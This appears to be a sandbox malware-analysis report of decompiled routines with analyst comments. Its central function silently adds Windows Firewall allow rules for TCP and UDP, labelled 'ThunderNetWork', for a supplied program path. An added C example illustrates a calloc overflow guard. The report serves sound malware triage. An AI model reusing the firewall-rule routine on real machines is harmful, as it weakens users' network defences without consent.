                                                                                                                                                					E0040562D(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                                                                				} else {
                                                                                                                                                					free( *_t63);
                                                                                                                                                				}
                                                                                                                                                				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                                                                				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                                                                				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                                                                				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                                                                				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                                                                				return _t30;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 00406271
                                                                                                                                                • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74B04E00,?,00000000), ref: 00406294
                                                                                                                                                  • Part of subcall function 0040562D: malloc.MSVCRT ref: 00405649
                                                                                                                                                  • Part of subcall function 0040562D: memcpy.MSVCRT ref: 00405661
                                                                                                                                                  • Part of subcall function 0040562D: free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74B04E00,?,00000000), ref: 0040566A
                                                                                                                                                • free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,74B04E00,?,00000000), ref: 004062B7
                                                                                                                                                • memcpy.MSVCRT ref: 004062DB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                • Opcode ID: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                • Instruction ID: 328e5c77b206eb01c5c4dd085cb03c2c4ac654035e51f3c9fb1ea2fb7f212fdc
                                                                                                                                                • Opcode Fuzzy Hash: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                • Instruction Fuzzy Hash: 3A21AEB1600704EFC730EF19D881C9AB7F9EF483247104A2EF856A7291D775B925CB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Executed Functions

                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                			E00BF1372(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                				void* _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				void* _v20;
                                                                                                                                                				void* _v24;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                				intOrPtr* _t88;
                                                                                                                                                				intOrPtr* _t89;
                                                                                                                                                				intOrPtr* _t90;
                                                                                                                                                				intOrPtr* _t95;
                                                                                                                                                				intOrPtr _t96;
                                                                                                                                                				intOrPtr* _t97;
                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                				intOrPtr _t100;
                                                                                                                                                				intOrPtr* _t101;
                                                                                                                                                				intOrPtr* _t103;
                                                                                                                                                				intOrPtr* _t105;
                                                                                                                                                				intOrPtr* _t107;
                                                                                                                                                				intOrPtr* _t109;
                                                                                                                                                				intOrPtr* _t111;
                                                                                                                                                				intOrPtr* _t113;
                                                                                                                                                				intOrPtr* _t115;
                                                                                                                                                				intOrPtr _t118;
                                                                                                                                                				intOrPtr* _t119;
                                                                                                                                                				intOrPtr* _t121;
                                                                                                                                                				intOrPtr* _t123;
                                                                                                                                                				intOrPtr* _t125;
                                                                                                                                                				intOrPtr* _t127;
                                                                                                                                                				intOrPtr* _t129;
                                                                                                                                                				intOrPtr* _t131;
                                                                                                                                                				intOrPtr* _t133;
                                                                                                                                                				void* _t135;
                                                                                                                                                				void* _t163;
                                                                                                                                                				void* _t166;
                                                                                                                                                				signed int _t167;
                                                                                                                                                				intOrPtr* _t169;
	_t167 = 0;
	_v16 = 0x80004005; // E_FAIL: default HRESULT until a later call overwrites it
	_v24 = 0; // policy interface (see annotations below)
	_v20 = 0; // rule-collection interface
	_v8 = 0; // rule interface
	_v12 = 0; // active profile bitmask
	// E00BF80F0 converts an ANSI string to a BSTR (ConvertStringToBSTR / SysAllocString in the API list below)
	_v28 = E00BF80F0(__edx, _a4); // rule name (caller-supplied)
	_v32 = E00BF80F0(__edx, "ThunderNetWork"); // rule description
	_t85 = E00BF80F0(__edx, _a8); // application path (caller-supplied)
	_v36 = _t85;
	__imp__CoInitializeEx(0, 2, _t166); // executed; 2 = COINIT_APARTMENTTHREADED
	_v40 = _t85; // decompiler artifact: _t85 now holds the CoInitializeEx HRESULT (eax), saved for the CoUninitialize decision at the end
	if(_t85 == 0x80010106 || _t85 >= 0) { // 0x80010106 = RPC_E_CHANGED_MODE (COM already initialised in another mode) is tolerated
		_t87 = E00BF1058( &_v24,  &_v24); // obtains the policy interface in _v24
		_v16 = _t87;
		if(_t87 >= _t167) {
			// Analyst annotation: the vtable offsets used below are consistent with the Windows Firewall
			// COM interfaces INetFwPolicy2 / INetFwRules / INetFwRule (inferred from the offsets; the decompiler does not name them).
			_t95 = _v24;
			_t96 =  *((intOrPtr*)( *_t95 + 0x48))(_t95,  &_v20); // inferred: INetFwPolicy2::get_Rules -> _v20
			_v16 = _t96;
			if(_t96 >= _t167) {
				_t97 = _v24;
				_t98 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97,  &_v12); // inferred: INetFwPolicy2::get_CurrentProfileTypes -> _v12
				_v16 = _t98;
				if(_t98 >= _t167) {
					if((_v12 & 0x00000004) != 0 && _v12 != 4) { // bit 4 = public profile: dropped when other profiles are active as well
						_v12 = _v12 ^ 0x00000004;
					}
					_t169 = __imp__CoCreateInstance;
					_t100 =  *_t169(0xbfdb2c, _t167, 1, 0xbfdb3c,  &_v8, _t163, _t135); // executed; CLSID at 0xbfdb2c, IID at 0xbfdb3c (not resolved in this dump), 1 = CLSCTX_INPROC_SERVER
					_v16 = _t100;
					if(_t100 >= 0) {
						_t101 = _v8;
						 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v28); // inferred: put_Name
						_t103 = _v8;
						 *((intOrPtr*)( *_t103 + 0x28))(_t103, _v32); // inferred: put_Description
						_t105 = _v8;
						 *((intOrPtr*)( *_t105 + 0x30))(_t105, _v36); // inferred: put_ApplicationName
						_t107 = _v8;
						 *((intOrPtr*)( *_t107 + 0x40))(_t107, 6); // inferred: put_Protocol, 6 = TCP
						_t109 = _v8;
						 *((intOrPtr*)( *_t109 + 0x98))(_t109, _v12); // inferred: put_Profiles
						_t111 = _v8;
						 *((intOrPtr*)( *_t111 + 0xa8))(_t111, 1); // inferred: put_Action, 1 = allow
						_t113 = _v8;
						 *((intOrPtr*)( *_t113 + 0x88))(_t113, 0xffffffff); // inferred: put_Enabled, VARIANT_TRUE
						_t115 = _v20;
						 *((intOrPtr*)( *_t115 + 0x20))(_t115, _v8); // inferred: INetFwRules::Add (first rule, TCP)
						_t118 =  *_t169(0xbfdb2c, 0, 1, 0xbfdb3c,  &_v8); // second rule object
						_v16 = _t118;
						if(_t118 >= 0) {
							_t119 = _v8;
							 *((intOrPtr*)( *_t119 + 0x20))(_t119, _v28);
							_t121 = _v8;
							 *((intOrPtr*)( *_t121 + 0x28))(_t121, _v32);
							_t123 = _v8;
							 *((intOrPtr*)( *_t123 + 0x30))(_t123, _v36);
							_t125 = _v8;
							 *((intOrPtr*)( *_t125 + 0x40))(_t125, 0x11); // 0x11 = 17 = UDP; otherwise identical to the TCP rule
							_t127 = _v8;
							 *((intOrPtr*)( *_t127 + 0x98))(_t127, _v12);
							_t129 = _v8;
							 *((intOrPtr*)( *_t129 + 0xa8))(_t129, 1);
							_t131 = _v8;
							 *((intOrPtr*)( *_t131 + 0x88))(_t131, 0xffffffff);
							_t133 = _v20;
							_v16 =  *((intOrPtr*)( *_t133 + 0x20))(_t133, _v8); // inferred: INetFwRules::Add (second rule, UDP); its HRESULT is the return value
						}
					}
					_t167 = 0;
				}
			}
		}
	}
	// cleanup: vtable +8 is IUnknown::Release on each interface that was obtained
	_t88 = _v8;
	if(_t88 != _t167) {
		 *((intOrPtr*)( *_t88 + 8))(_t88);
	}
	_t89 = _v20;
	if(_t89 != _t167) {
		 *((intOrPtr*)( *_t89 + 8))(_t89);
	}
	_t90 = _v24;
	if(_t90 != _t167) {
		 *((intOrPtr*)( *_t90 + 8))(_t90);
	}
	if(_v40 >= _t167) { // only balance CoInitializeEx when it actually succeeded
		__imp__CoUninitialize(); // executed
	}
	return _v16;
}
Listing address gutter (instruction addresses belonging to the decompiled lines above, separated from them by extraction): 0x00bf137c through 0x00bf1566.

                                                                                                                                                APIs
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1391
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF139E
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF13A9
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000002,80004005,ThunderNetWork,?), ref: 00BF13B4
                                                                                                                                                • CoCreateInstance.OLE32(00BFDB2C,00000000,00000001,00BFDB3C,?), ref: 00BF143C
                                                                                                                                                • CoCreateInstance.OLE32(00BFDB2C,00000000,00000001,00BFDB3C,?), ref: 00BF14B9
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF155C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$ByteCharCreateErrorInstanceLastMultiWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                • String ID: ThunderNetWork
                                                                                                                                                • API String ID: 3644708077-3075295172
                                                                                                                                                • Opcode ID: ea38d002e499012a1a132940d87f84e47fe6c45783d47f7da4060beaa6763368
                                                                                                                                                • Instruction ID: a0a7adb2544a5f9cfa2271715c53c632d8563faf6b4ca7afa8b0ac35ad3d5ea5
                                                                                                                                                • Opcode Fuzzy Hash: ea38d002e499012a1a132940d87f84e47fe6c45783d47f7da4060beaa6763368
                                                                                                                                                • Instruction Fuzzy Hash: C371C675A00219EFCB00DFE4C888AAEBBB9FF49714F204899F505EB251CB359A45DF50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                			E00BF74CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                				long _t21;
                                                                                                                                                				long _t23;
                                                                                                                                                				long _t24;
                                                                                                                                                				void* _t25;
                                                                                                                                                				long _t31;
                                                                                                                                                				signed int _t32;
                                                                                                                                                				signed int _t33;
                                                                                                                                                				signed int _t39;
                                                                                                                                                				signed int _t45;
                                                                                                                                                				long _t49;
                                                                                                                                                				void* _t52;
                                                                                                                                                				void* _t53;
                                                                                                                                                
                                                                                                                                                				_push(0xc);
                                                                                                                                                				_push(0xbfdec8);
                                                                                                                                                				E00BF3F70(__ebx, __edi, __esi);
                                                                                                                                                				_t39 =  *(_t52 + 8);
                                                                                                                                                				if(_t39 <= 0) {
                                                                                                                                                					L4:
                                                                                                                                                					_t49 = _t39 *  *(_t52 + 0xc);
                                                                                                                                                					 *(_t52 + 8) = _t49;
                                                                                                                                                					__eflags = _t49;
                                                                                                                                                					if(_t49 == 0) {
                                                                                                                                                						_t49 = 1;
                                                                                                                                                						__eflags = 1;
                                                                                                                                                					}
                                                                                                                                                					do {
                                                                                                                                                						_t38 = 0;
                                                                                                                                                						 *(_t52 - 0x1c) = 0;
                                                                                                                                                						__eflags = _t49 - 0xffffffe0;
						if(_t49 > 0xffffffe0) { // 0xffffffe0: largest byte count the routine will pass to the heap
                                                                                                                                                							L13:
                                                                                                                                                							__eflags = _t38;
                                                                                                                                                							if(_t38 != 0) {
                                                                                                                                                								L21:
                                                                                                                                                								_t21 = _t38;
                                                                                                                                                								L22:
                                                                                                                                                								return E00BF3FB5(_t21);
                                                                                                                                                							}
                                                                                                                                                							__eflags =  *0xc00a20; // 0x0
                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                								__eflags = _t38;
                                                                                                                                                								if(_t38 == 0) {
                                                                                                                                                									_t23 =  *(_t52 + 0x10);
                                                                                                                                                									__eflags = _t23;
                                                                                                                                                									if(_t23 != 0) {
                                                                                                                                                										 *_t23 = 0xc;
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                								goto L21;
                                                                                                                                                							}
                                                                                                                                                							goto L15;
                                                                                                                                                						}
                                                                                                                                                						__eflags =  *0xc00a98 - 3;
                                                                                                                                                						if( *0xc00a98 != 3) {
                                                                                                                                                							L11:
                                                                                                                                                							__eflags = _t38;
                                                                                                                                                							if(_t38 != 0) {
                                                                                                                                                								goto L21;
                                                                                                                                                							}
                                                                                                                                                							L12:
						_t25 = RtlAllocateHeap( *0xc0093c, 8, _t49); // executed; flags 8 = HEAP_ZERO_MEMORY (zero-filled block)
                                                                                                                                                							_t38 = _t25;
                                                                                                                                                							goto L13;
                                                                                                                                                						}
                                                                                                                                                						_t49 = _t49 + 0x0000000f & 0xfffffff0;
                                                                                                                                                						 *(_t52 + 0xc) = _t49;
                                                                                                                                                						__eflags =  *(_t52 + 8) -  *0xc00a84; // 0x0
                                                                                                                                                						if(__eflags > 0) {
                                                                                                                                                							goto L11;
                                                                                                                                                						}
                                                                                                                                                						E00BF3C3D(0, 4);
                                                                                                                                                						 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                                                                						_push( *(_t52 + 8));
                                                                                                                                                						 *(_t52 - 0x1c) = E00BF6CFF();
                                                                                                                                                						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
                                                                                                                                                						E00BF75C8();
                                                                                                                                                						_t38 =  *(_t52 - 0x1c);
                                                                                                                                                						__eflags = _t38;
                                                                                                                                                						if(_t38 == 0) {
                                                                                                                                                							goto L12;
                                                                                                                                                						}
                                                                                                                                                						E00BF4E20(0, _t38, 0,  *(_t52 + 8));
                                                                                                                                                						_t53 = _t53 + 0xc;
                                                                                                                                                						goto L11;
                                                                                                                                                						L15:
                                                                                                                                                						_t24 = E00BF45B5(_t49);
                                                                                                                                                						__eflags = _t24;
                                                                                                                                                					} while (_t24 != 0);
                                                                                                                                                					_t31 =  *(_t52 + 0x10);
                                                                                                                                                					__eflags = _t31;
                                                                                                                                                					if(_t31 != 0) {
                                                                                                                                                						 *_t31 = 0xc;
                                                                                                                                                					}
                                                                                                                                                					L3:
                                                                                                                                                					_t21 = 0;
                                                                                                                                                					goto L22;
                                                                                                                                                				}
                                                                                                                                                				_t32 = 0xffffffe0;
                                                                                                                                                				_t33 = _t32 / _t39;
                                                                                                                                                				_t45 = _t32 % _t39;
                                                                                                                                                				asm("sbb eax, eax");
                                                                                                                                                				_t58 = _t33 + 1;
                                                                                                                                                				if(_t33 + 1 != 0) {
                                                                                                                                                					goto L4;
                                                                                                                                                				} else {
                                                                                                                                                					 *((intOrPtr*)(E00BF38CA(_t58))) = 0xc;
                                                                                                                                                					_push(0);
                                                                                                                                                					_push(0);
                                                                                                                                                					_push(0);
                                                                                                                                                					_push(0);
                                                                                                                                                					_push(0);
                                                                                                                                                					E00BF3862(_t45, 0, __esi);
                                                                                                                                                					goto L3;
                                                                                                                                                				}
                                                                                                                                                			}
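The routine E00BF74CC above has the shape of a C-runtime calloc implementation: it divides 0xffffffe0 by the element count before multiplying, forces a zero-byte request up to one byte, calls RtlAllocateHeap with flag 8 (HEAP_ZERO_MEMORY) and stores 0xc (ENOMEM) through the caller's error pointer when the request is too large or the heap call fails. The C below is an added example written for this page, not code from the sample or from the sandbox report. It reproduces that size validation on unsigned 32-bit values so the multiplication wrap it guards against can be reproduced on any host; the function names (validate_request32, zeroed_alloc32 and the check helpers) are this example's own, and calloc stands in for the Windows heap call.

```c
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

/* Constants as they appear in the decompiled routine at 00BF74CC. */
#define HEAP_MAXREQ 0xffffffe0u   /* largest byte count the routine hands to the heap */
#define ERR_NOMEM   0xc           /* ENOMEM (12), stored through the caller's errno pointer */

/* Naive 32-bit product, kept only to show the wrap the guard below prevents. */
uint32_t naive_product32(uint32_t count, uint32_t size)
{
    return count * size;          /* 0x10000 * 0x10000 wraps to 0 in 32 bits */
}

/* Size validation in the same order as the decompiled function: divide first,
   multiply only once the product is known to fit, then force a zero request up
   to one byte. Returns 0 on accept, ERR_NOMEM on reject. */
int validate_request32(uint32_t count, uint32_t size, uint32_t *total_out)
{
    if (count > 0 && (HEAP_MAXREQ / count) < size)
        return ERR_NOMEM;          /* count * size would exceed HEAP_MAXREQ or wrap */
    uint32_t total = count * size; /* safe here: total <= HEAP_MAXREQ */
    if (total == 0)
        total = 1;
    *total_out = total;
    return 0;
}

/* Zero-filled allocation of the validated size. calloc(1, n) stands in for the
   sample's RtlAllocateHeap(heap, HEAP_ZERO_MEMORY (flag 8), n). */
void *zeroed_alloc32(uint32_t count, uint32_t size, int *errno_out)
{
    uint32_t total;
    int rc = validate_request32(count, size, &total);
    if (rc != 0) {
        if (errno_out) *errno_out = rc;
        return NULL;
    }
    void *p = calloc(1, total);
    if (p == NULL && errno_out) *errno_out = ERR_NOMEM;
    return p;
}

/* Helpers that return plain values so the behaviour can be checked without I/O. */
int request_status(uint32_t count, uint32_t size)
{
    uint32_t total;
    return validate_request32(count, size, &total);
}

uint32_t request_total(uint32_t count, uint32_t size)
{
    uint32_t total = 0;
    return validate_request32(count, size, &total) == 0 ? total : 0;
}

/* 1 if the allocation succeeds and every byte reads back as zero, else 0. */
int alloc_is_zeroed(uint32_t count, uint32_t size)
{
    int err = 0;
    unsigned char *p = zeroed_alloc32(count, size, &err);
    if (p == NULL) return 0;
    uint32_t total = request_total(count, size);
    int ok = 1;
    for (uint32_t i = 0; i < total; i++)
        if (p[i] != 0) { ok = 0; break; }
    free(p);
    return ok;
}

int main(void)
{
    int err = 0;
    printf("naive 0x10000*0x10000 = %u\n", naive_product32(0x10000u, 0x10000u));
    printf("guarded request status = %d (0xc = ENOMEM)\n", request_status(0x10000u, 0x10000u));
    void *p = zeroed_alloc32(0x10000u, 0x10000u, &err);
    printf("zeroed_alloc32 -> %p, err=%d\n", p, err);
    free(p);
    return 0;
}
```

The first printf shows the product that an unchecked multiply would hand to the heap (zero, which the routine would then bump to a one-byte block while the caller believes it owns 4 GiB); the second shows the division guard rejecting the same request with ENOMEM. When triaging a report such as this one, recognising a function as this runtime pattern lets you set it aside and concentrate on the sample's own logic, for example the CoCreateInstance calls around the ThunderNetWork string listed at the top of this section.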
                                                                                                                                                0x00bf74cc
                                                                                                                                                0x00bf74ce
                                                                                                                                                0x00bf74d3
                                                                                                                                                0x00bf74d8
                                                                                                                                                0x00bf74df
                                                                                                                                                0x00bf750f
                                                                                                                                                0x00bf7513
                                                                                                                                                0x00bf7515
                                                                                                                                                0x00bf7518
                                                                                                                                                0x00bf751a
                                                                                                                                                0x00bf751e
                                                                                                                                                0x00bf751e
                                                                                                                                                0x00bf751e
                                                                                                                                                0x00bf751f
                                                                                                                                                0x00bf751f
                                                                                                                                                0x00bf7521
                                                                                                                                                0x00bf7524
                                                                                                                                                0x00bf7527
                                                                                                                                                0x00bf7592
                                                                                                                                                0x00bf7592
                                                                                                                                                0x00bf7594
                                                                                                                                                0x00bf75e2
                                                                                                                                                0x00bf75e2
                                                                                                                                                0x00bf75e4
                                                                                                                                                0x00bf75e9
                                                                                                                                                0x00bf75e9
                                                                                                                                                0x00bf7596
                                                                                                                                                0x00bf759c
                                                                                                                                                0x00bf75d1
                                                                                                                                                0x00bf75d3
                                                                                                                                                0x00bf75d5
                                                                                                                                                0x00bf75d8
                                                                                                                                                0x00bf75da
                                                                                                                                                0x00bf75dc
                                                                                                                                                0x00bf75dc
                                                                                                                                                0x00bf75da
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf75d3
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf759c
                                                                                                                                                0x00bf7529
                                                                                                                                                0x00bf7530
                                                                                                                                                0x00bf757d
                                                                                                                                                0x00bf757d
                                                                                                                                                0x00bf757f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf7581
                                                                                                                                                0x00bf758a
                                                                                                                                                0x00bf7590
                                                                                                                                                0x00000000
                                                                                                                                                0x00bf7590
APIs
• __lock.LIBCMT ref: 00BF7548
• ___sbh_alloc_block.LIBCMT ref: 00BF7554
• _memset.LIBCMT ref: 00BF7575
• RtlAllocateHeap.NTDLL(00000008,?,00BFDEC8,0000000C,00BF5589,00000000,?,00000000,00000000,00000000,?,00BF334F,00000001,00000214,?,00000000), ref: 00BF758A
  • Part of subcall function 00BF38CA: __getptd_noexit.LIBCMT ref: 00BF38CA
  • Part of subcall function 00BF3862: __decode_pointer.LIBCMT ref: 00BF386D
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
• String ID:
• API String ID: 3771094184-0
• Opcode ID: 3edd295fbf6c85fe205cc7b0ccea85c1936c386913fb9d38ac9a29108e489361
• Instruction ID: e41001daefa7fe63058ca3b943ed4b2633cee1ecb565439300dc5a44c0d2554c
• Opcode Fuzzy Hash: 3edd295fbf6c85fe205cc7b0ccea85c1936c386913fb9d38ac9a29108e489361
• Instruction Fuzzy Hash: 9F21F570A8860D9BCB11AF68DC80A7D77E1FB60750F2542D5FA159B1D1DF308E49CB40
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00BF2087(int _a4) {

	E00BF205C(_a4);
	ExitProcess(_a4);
}
APIs
• ___crtCorExitProcess.LIBCMT ref: 00BF208F
  • Part of subcall function 00BF205C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00BF2094,00000000,?,00BF740E,000000FF,0000001E,?,00BF553F,00000000,00000001,00000000,?,00BF3BC7,00000018), ref: 00BF2066
  • Part of subcall function 00BF205C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BF2076
• ExitProcess.KERNEL32 ref: 00BF2098
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: ExitProcess$AddressHandleModuleProc___crt
• String ID:
• API String ID: 2427264223-0
• Opcode ID: a5c17a9cc363b7e2e7141d6fd5cbf5725f351ece54aebe5a247c7103e8496624
• Instruction ID: 313440e7783fe40f543a0d41058c5ca78b698d317038779482b2e5a0b8b29d8e
• Opcode Fuzzy Hash: a5c17a9cc363b7e2e7141d6fd5cbf5725f351ece54aebe5a247c7103e8496624
• Instruction Fuzzy Hash: 79B09B3200010CFBCB112F21DC0A8597F55DB403907105010F50807071DF71DD93D590
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00BF4D4A(intOrPtr _a4) {
	void* _t6;

	_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
	 *0xc0093c = _t6;
	if(_t6 != 0) {
		 *0xc00a98 = 1;
		return 1;
	} else {
		return _t6;
	}
}
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00BF4D5F
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: 8ee6201a9919428741074cccfdeb0167b4946e078c6013bb405af10a54d3f551
• Instruction ID: 9354cdef697e5c4755737bcfb6bec86f2b841c94413795ba171cf2f5570824c9
• Opcode Fuzzy Hash: 8ee6201a9919428741074cccfdeb0167b4946e078c6013bb405af10a54d3f551
• Instruction Fuzzy Hash: 48D05E76654709AEEB005F71BC0973A3BDCD784395F268436B90CC7190EA74C980DB00
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 25%
E00BF22A3(intOrPtr _a4) {
	void* __ebp;
	void* _t2;
	void* _t3;
	void* _t4;
	void* _t5;
	void* _t6;
	void* _t9;

	_push(0);
	_push(0);
	_push(_a4);
	_t2 = E00BF2177(_t3, _t4, _t5, _t6, _t9); // executed
	return _t2;
}
APIs
• _doexit.LIBCMT ref: 00BF22AF
  • Part of subcall function 00BF2177: __lock.LIBCMT ref: 00BF2185
  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF21BC
  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF21D1
  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF21FB
  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF2211
  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF221E
  • Part of subcall function 00BF2177: __initterm.LIBCMT ref: 00BF224D
  • Part of subcall function 00BF2177: __initterm.LIBCMT ref: 00BF225D
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: __decode_pointer$__initterm$__lock_doexit
• String ID:
• API String ID: 1597249276-0
• Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction ID: 8c10cafe031115f2e0f7d7b4e62bc06c22dc363766a55948299f7c9eea7584d1
• Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction Fuzzy Hash: 32B0143154030C33D5101541DC03F153F4D47C1750F140050FF0C1D1D155537555C0CD
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(00BFDB0C,00000000,00000001,00BFDB1C,?,00BF1135,00000000), ref: 00BF106A
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
